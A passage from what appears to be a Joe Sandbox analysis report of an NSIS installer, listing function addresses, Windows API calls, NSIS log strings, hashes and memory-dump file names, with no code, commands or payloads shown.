Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
DifferencesRecognisedImmune, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$DifferencesRecognisedImmune$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1022566774
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
